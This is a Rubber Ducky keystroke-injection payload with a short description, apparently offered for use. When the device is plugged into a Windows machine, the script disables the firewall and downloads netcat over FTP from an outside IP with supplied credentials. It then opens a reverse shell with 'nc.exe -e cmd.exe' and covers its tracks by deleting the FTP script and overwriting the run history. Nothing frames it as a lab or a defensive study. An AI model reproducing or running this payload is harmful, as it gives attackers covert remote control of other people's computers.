This script will:
* create an FTP script that logs you in to the FTP server and download netcat
* delete the FTP script file
* run netcat in daemon mode
* run cmd.exe one more time to conceal the command we used in the run history.

Fill in the required information where you see the brackets.
```c
DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open [98.247.220.177] [443] > ftp.txt
ENTER
DELAY 100
STRING echo [root]>> ftp.txt
ENTER
DELAY 100
STRING echo [88Legend]>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc.exe [10.0.0.15] [443] -e cmd.exe -d
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER
```